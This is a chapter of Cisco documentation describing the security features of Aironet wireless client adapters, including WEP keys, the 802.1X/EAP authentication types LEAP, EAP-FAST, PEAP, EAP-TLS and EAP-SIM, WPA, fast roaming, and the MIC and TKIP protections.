The documentation set for this product strives to use bias-free language. For the purposes of this documentation set, bias-free is defined as language that does not imply discrimination based on age, disability, gender, racial identity, ethnic identity, sexual orientation, socioeconomic status, and intersectionality. Exceptions may be present in the documentation due to language that is hardcoded in the user interfaces of the product software, language used based on RFP documentation, or language that is used by a referenced third-party product. Learn more about how Cisco is using Inclusive Language.
This chapter describes the security features. The following topics are covered in the chapter.
•EAP (with Static or Dynamic WEP Keys)
•Additional WEP Key Security Features
•Synchronizing Security Features
You can protect your data as it is transmitted through your wireless network by encrypting it with Wired Equivalent Privacy (WEP) encryption keys. With WEP encryption, the transmitting device encrypts each packet with a WEP key, and the receiving device uses that same key to decrypt each packet.
The WEP keys used to encrypt and decrypt transmitted data can be statically associated with your adapter or dynamically created as part of the EAP authentication process. The information in the "Static WEP Keys" and "EAP (with Static or Dynamic WEP Keys)" sections below can help you to decide which type of WEP keys to use. Dynamic WEP keys with EAP offer a higher degree of security than static WEP keys.
WEP keys, whether static or dynamic, are either 40 or 128 bits long. 128-bit WEP keys offer a greater level of security than 40-bit WEP keys.
Note Refer to the "Additional WEP Key Security Features" section for information on three security features that can make your WEP keys even more secure.
Each device (or profile) within your wireless network can be assigned up to four static WEP keys. If a device receives a packet that is not encrypted with the appropriate key (as the WEP keys of all devices that are to communicate with each other must match), the device discards the packet and never delivers it to the intended receiver.
Static WEP keys are write-only and temporary; therefore, they cannot be read back from the client adapter, and they are lost when power to the adapter is removed or the Windows device is rebooted. Although the keys are temporary, you do not need to re-enter them each time the client adapter is inserted or the Windows device is rebooted because the keys are stored (in an encrypted format for security reasons) in the registry of the Windows device. When the driver loads and reads the client adapter's registry parameters, it also finds the static WEP keys, unencrypts them, and stores them in volatile memory on the adapter.
The Security Tab window enables you to view the current WEP key settings for the client adapter and then to assign new WEP keys or overwrite existing WEP keys as well as to enable or disable static WEP. Refer to the "Entering a New Static WEP Key" section or "Disabling Static WEP" section for instructions.
The new standard for wireless LAN security, as defined by the IEEE, is called 802.1X for 802.11, or simply 802.1X. An access point that supports 802.1X and its protocol, Extensible Authentication Protocol (EAP), acts as the interface between a wireless client and an authentication server such as a RADIUS server, to which the access point communicates over the wired network.
Three 802.1X authentication types can be selected in ACAT for use with Windows operating systems:
•LEAP—This authentication type is available for Windows 95, 98, NT, 2000, Me, and XP, as well as non-Windows systems. Support for LEAP is provided not in the Windows operating system but in your client adapter's firmware and the Cisco software that supports it. RADIUS servers that support LEAP include Cisco Secure ACS release 2.6 and later, Cisco Access Registrar release 1.7 and later, and Funk Software's Steel-Belted RADIUS release 3.0 and later.
LEAP can be enabled or disabled for a specific profile through ACAT. When enabled, a variety of configuration options are available, including how and when a username and password are entered to begin the authentication process.
The username and password are used by the client adapter to perform mutual authentication with the RADIUS server through the access point. The username and password are stored in the client adapter's volatile memory; therefore, they are temporary and need to be re-entered whenever power is removed from the adapter, typically because of the client adapter being ejected or the system powering down.
•EAP-FAST—This authentication type (Flexible Authentication via Secure Tunneling) is available for Windows 2000 and XP systems. Support for EAP-FAST is provided not in the Windows operating system but in your client adapter's firmware and the Cisco software that supports it. RADIUS servers that support EAP-FAST include Cisco Secure ACS release 3.2.3 and later.
Note The Install Wizard does not provide an error indication when a profile with EAP-FAST fails to install on a non-supported operating system.
EAP-FAST can be enabled or disabled for a specific profile using ACAT, or the ACU can be used if the EAP-FAST security module was selected during installation. When EAP-FAST is enabled, a variety of configuration options are available, including how and when a username and password are entered to begin the authentication process and whether automatic or manual protected access credentials (PAC) provisioning is used.
The username, password, and PAC are used by the client adapter to perform mutual authentication with the RADIUS server through the access point. The username and password need to be re-entered each time the client adapter is inserted or the Windows device is rebooted, unless you configure your adapter to use saved EAP-FAST credentials.
PACs are created by Cisco Secure ACS and are identified by an ID. The user obtains his or her own copy of the PAC from the server, and the ID links the PAC to the profile created by ACAT or the ACU. When manual PAC provisioning is enabled, the PAC file is manually copied from the server and imported into the client device using the ACU. The following rules govern PAC storage:
–In most cases PACs are provisioned and stored separately for each Windows logon user. These per-user PACS are not viewable by other users.
–If a profile is configured to use manual provisioning, each user must manually provision his or her own PAC for that profile using the ACU.
–PAC files can be added or replaced using the ACU import feature, but they cannot be removed or exported.
–For profiles configured with saved EAP-FAST usernames and passwords, the PACs are not stored per user but in a global PAC area shared by all users. Global PACs are also enabled when the No Network Connection Unless User Is Logged In checkbox is unchecked on the ACU. These global PACs can be imported using the ACU and used by all users.
Note Checking the Use Saved Username and Password check box in ACAT enables the option on the ACU. You must use the ACU to enter the EAP-FAST username and password parameters.
Note PACs are also stored globally on computers that use the Novell Network login prompt or any other third-party login application that does not share its credentials with the EAP-FAST supplicant.
EAP-FAST authentication is designed to support the following user databases over a wireless LAN:
–Cisco Secure ACS internal user database
–Cisco Secure ACS ODBC user database
–Windows NT/2000/2003 domain user database
–LDAP user database
LDAP user databases (such as NDS) support only manual PAC provisioning while the other three user databases support both automatic and manual PAC provisioning.
Note If the EAP-FAST security module was not selected during installation, the EAP-FAST option is unavailable in the ACU. To enable and disable EAP-FAST, you must run ACAT or the Install Wizard again and select EAP-FAST. EAP-FAST is supported in ACAT and Install Wizard versions 1.3 and later.
•EAP—Selecting this option enables you to use any 802.1X authentication type for which your operating system has support. For example, if your operating system uses the 802.1X supplicant, it provides native support for EAP-TLS authentication and general support for PEAP and EAP-SIM authentication.
Note To use EAP-TLS, PEAP, or EAP-SIM you must install the Microsoft 802.1X supplicant and the PEAP or EAP-SIM security module; configure your client adapter using ACAT or the ACU; enable the authentication type in Windows; and enable Network-EAP on the access point.
–EAP-TLS—EAP-TLS is enabled or disabled through the operating system and uses a dynamic session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt data. Once enabled, a few configuration parameters must be set within the operating system.
RADIUS servers that support EAP-TLS include Cisco Secure ACS release 3.0 or later and Cisco Access Registrar release 1.8 or later.
Note EAP-TLS requires the use of a certificate. Refer to Microsoft's documentation for information on downloading and installing the certificate.
–Protected EAP (or PEAP)—PEAP authentication is designed to support One-Time Password (OTP), Windows NT or 2000 domain, and LDAP user databases over a wireless LAN. It is based on EAP-TLS authentication but uses a password or PIN instead of a client certificate for authentication. PEAP is enabled or disabled through the operating system and uses a dynamic session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt data. If your network uses an OTP user database, PEAP requires you to enter either a hardware token password or a software token PIN to start the EAP authentication process and gain access to the network. If your network uses a Windows NT or 2000 domain user database or an LDAP user database (such as NDS), PEAP requires you to enter your username, password, and domain name in order to start the authentication process.
RADIUS servers that support PEAP authentication include Cisco Secure ACS release 3.1 or later and Cisco Access registrar release 3.5 or later.
Note Service Pack 1 for Windows XP and the Microsoft 802.1X supplicant for
Windows 2000 include Microsoft's PEAP supplicant, which supports a Windows username and password only and does not operate with Cisco's PEAP supplicant. To use Cisco's PEAP supplicant, install the Install Wizard file after Service Pack 1 for Windows XP or the Microsoft's 802.1X supplicant for Windows 2000. Otherwise, Cisco's PEAP is overwritten by Microsoft's PEAP supplicant.
–EAP-SIM—EAP-SIM authentication is designed for use in public wireless LANs and requires clients equipped with PCSC-compliant smartcard readers. The EAP-SIM supplicant included in the Install Wizard file supports only Gemplus SIM+ cards; however, an updated supplicant is available that supports standard GSM-SIM cards as well as more recent versions of the EAP-SIM protocol. The new supplicant is available for download from the ftpeng FTP server at the following URL:
ftp://ftpeng.cisco.com/ftp/pwlan/eapsim/CiscoEapSim.dll
Please note that the above requirements are necessary but not sufficient to successfully perform EAP-SIM authentication. Typically, you are also required to enter into a service contract with a WLAN service provider, who must support EAP-SIM authentication in its network. Also, while your PCSC smartcard reader may be able to read standard GSM-SIM cards or chips, EAP-SIM authentication usually requires your GSM cell phone account to be provisioned for WLAN service by your service provider.
EAP-SIM is enabled or disabled through the operating system and uses a dynamic session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt data. EAP-SIM requires you to enter a user verification code, or PIN, for communication with the SIM card. You can choose to have the PIN stored in your computer or to be prompted to enter it after a reboot or prior to every authentication attempt.
RADIUS servers that support EAP-SIM include Cisco Access Registrar release 3.0 or later.
Note Because EAP-TLS, PEAP, and EAP-SIM authentication are enabled in the operating system and not in ACU, you cannot switch between these authentication types simply by switching profiles in ACU. You can create a profile in ACU that uses host-based EAP, but you must enable the specific authentication type in Windows (provided Windows uses the Microsoft 802.1X supplicant). In addition, Windows can be set for only one authentication type at a time; therefore, if you have more than one profile in ACU that uses host-based EAP and you want to use another authentication type, you must change authentication types in Windows after switching profiles in ACU.
When you enable Network-EAP or Require EAP on your access point and configure your client adapter for LEAP, EAP-FAST, EAP-TLS, PEAP, or EAP-SIM, authentication to the network occurs in the following sequence:
1. The client associates to an access point and begins the authentication process.
Note The client does not gain full access to the network until authentication between the client and the RADIUS server is successful.
2. Communicating through the access point, the client and RADIUS server complete the authentication process, with the password (LEAP, EAP-FAST, and PEAP), certificate (EAP-TLS), or internal key stored on the SIM card and in the service provider's Authentication Center (EAP-SIM) being the shared secret for authentication. The password, certificate, or internal key is never transmitted during the process.
3. If authentication is successful, the client and RADIUS server derive a dynamic, session-based WEP key that is unique to the client.
4. The RADIUS server transmits the key to the access point using a secure channel on the wired LAN.
5. For the length of a session, or time period, the access point and the client use this key to encrypt or decrypt all unicast packets (and broadcast packets if the access point is set up to do so) that travel between them.
Refer to the "Enabling LEAP" section for instructions on enabling LEAP, or to the "Enabling EAP-FAST" section for instructions on enabling EAP-FAST, or to the "Enabling Host-Based EAP" section for instructions on enabling EAP-TLS, PEAP, or EAP-SIM.
Refer to the IEEE 802.11 standard for more information on 802.1X authentication and to the following URL for additional information on RADIUS servers:
http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/secur_c/scprt2/scrad.htm
Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It is derived from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA leverages Temporal Key Integrity Protocol (TKIP) for data protection and 802.1X for authenticated key management.
WPA supports two mutually exclusive key management types: WPA and WPA-Pre-shared key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK.
Note Only 350 series and CB20A cards that are installed on computers running Windows 2000 or XP and running LEAP, EAP-FAST, or host-based EAP authentication can be used with WPA.
Support for WPA is available in Install Wizard version 1.2 or later. However, if you want to use host-based EAP authentication with WPA, you must also install a host supplicant with WPA support. The following host supplicants are recommended for use with Cisco Aironet client adapters:
•Funk Odyssey Client supplicant release 2.2 (for Windows 2000)
•Windows XP Service Pack 1 and Microsoft supplicant Q815485 (for Windows XP)
Refer to the "Enabling LEAP" section for instructions on enabling LEAP with WPA or to the "Enabling Host-Based EAP" section for instructions on enabling EAP-TLS, PEAP, or EAP-SIM with WPA.
WPA must also be enabled on the access point. Access points must use Cisco IOS Release 12.2(11)JA or later to enable WPA. Refer to the documentation for your access point for instructions on enabling this feature.
Some applications that run on a client device may require fast roaming between access points. For example, voice applications require seamless roaming to prevent delays and gaps in conversation. Support for fast roaming is available for LEAP-enabled clients in Install Wizard version 1.1 or later or for EAP-FAST-enabled clients in Install Wizard version 1.3 or later.
During normal operation, LEAP or EAP-FAST-enabled clients mutually authenticate with a new access point by performing a complete LEAP or EAP-FAST authentication, including communication with the main RADIUS server. However, when you configure your wireless LAN for fast roaming, LEAP or EAP-FAST-enabled clients securely roam from one access point to another without the need to reauthenticate with the RADIUS server. Using Cisco Centralized Key Management (CCKM), an access point that is configured for wireless domain services (WDS) uses a fast rekeying technique that enables client devices to roam from one access point to another in under 150 milliseconds (ms). Fast roaming ensures that there is no perceptible delay in time-sensitive applications such as wireless Voice over IP (VoIP), enterprise resource planning (ERP), or Citrix-based solutions.
The fast roaming feature is enabled on the client adapter in two different ways, depending on the software installed:
•If you are using client adapter firmware version 5.40.xx (which is included in Install Wizard version 1.3), you need to enable fast roaming in ACAT or Aironet Client Utility (ACU) version 6.3. For additional details, refer to Step 11 in the "Enabling LEAP" section or to Step 12 in the "Enabling EAP-FAST" section.
•If you are using client adapter firmware version 5.20.17 (which is included in Install Wizard version 1.1), fast roaming is supported automatically.
Regardless of how fast roaming is enabled on the client adapter, it must also be enabled on the access point.
Note Access points must use Cisco IOS Release 12.2(11)JA or later to enable fast roaming. Refer to the documentation for your access point for instructions on enabling this feature.
Note If the Microsoft 802.1X supplicant is installed on your computer, you must disable one or two Windows parameters in order for this feature to operate correctly. Refer to Step 13 in the "Enabling LEAP" section for details.
Client adapter firmware version 5.02.20 or later and the following access point software releases support a feature that is designed to detect access points that fail LEAP authentication:
•VxWorks release 12.00T or later (340, 350, and 1200 series access points)
•Cisco IOS Release 12.2(4)JA or later (1100 series access points)
An access point running one of these software releases records a message in the system log when a client running firmware version 5.02.20 or later discovers and reports another access point in the wireless network that has failed LEAP or EAP-FAST authentication.
The process takes place as follows:
1. A client with a LEAP or EAP-FAST profile attempts to associate to access point A.
2. Access point A does not handle the LEAP or EAP-FAST authentication successfully, perhaps because the access point does not understand LEAP or EAP-FAST or cannot communicate to a trusted LEAP or EAP-FAST authentication server.
3. The client records the MAC address for access point A and the reason why the association failed.
4. The client associates successfully to access point B.
5. The client sends the MAC address of access point A and the reason code for the failure to access point B.
6. Access point B logs the failure in the system log.
Note This feature does not need to be enabled on the client adapter or access point; it is supported automatically in both devices. However, the client adapters and access points must use the firmware versions or software releases shown above (or later).
The three security features discussed in this section (MIC, TKIP, and broadcast key rotation) are designed to prevent sophisticated attacks on your wireless network's WEP keys. These features do not need to be enabled on the client adapter; they are supported automatically in the firmware and driver versions included in the Install Wizard file. However, they must be enabled on the access point.
For instructions on enabling these security features on your access point, refer to the corresponding software configuration guide or the installation and configuration guide available at the following URL:
http://www.cisco.com/univercd/cc/td/doc/product/wireless/index.htm.
Note The 340 and 350 series access points require VxWorks 11.10T or later to enable these security features. Refer to the documentation for your access point for instructions on enabling these security features.
MIC prevents bit-flip attacks on encrypted packets. During a bit-flip attack, an intruder intercepts an encrypted message, alters it slightly, and retransmits it, and the receiver accepts the retransmitted message as legitimate. The MIC adds a few bytes to each packet to make the packets tamper-proof.
The Status window indicates if MIC is being used, and the Statistics window provides MIC statistics.
Note If you enable MIC on the access point, your client adapter's driver must support these features; otherwise, the client cannot associate.
This feature, also referred to as WEP key hashing, defends against an attack on WEP in which the intruder uses the initialization vector (IV) in encrypted packets to calculate the WEP key. TKIP removes the predictability that an intruder relies on to determine the WEP key by exploiting IVs. It protects both unicast and broadcast WEP keys.
Note If you enable TKIP on the access point, your client adapter's firmware must support these features; otherwise, the client cannot associate.
Note TKIP is automatically enabled whenever WPA is enabled and disabled whenever WP A is disabled.
EAP authentication provides dynamic unicast WEP keys for client devices but uses static broadcast, or multicast, keys. When you enable broadcast WEP key rotation, the access point provides a dynamic broadcast WEP key and changes it at the interval you select. When you enable this feature, only wireless client devices using LEAP, EAP-TLS, PEAP, or EAP-SIM authentication can associate to the access point. Client devices using static WEP (with open or shared key authentication) cannot associate.
In order to use any of the security features discussed in this section, both your client adapter and the access point to which it associates must be set appropriately. Table 5-1 indicates the client and access point settings required for each security feature. Refer to "Installed Components Tab," and the "Security Tab" section for installation and configuration instructions for your client adapter's security features. Refer to the documentation for your access point for instructions on enabling any of these features for your access point.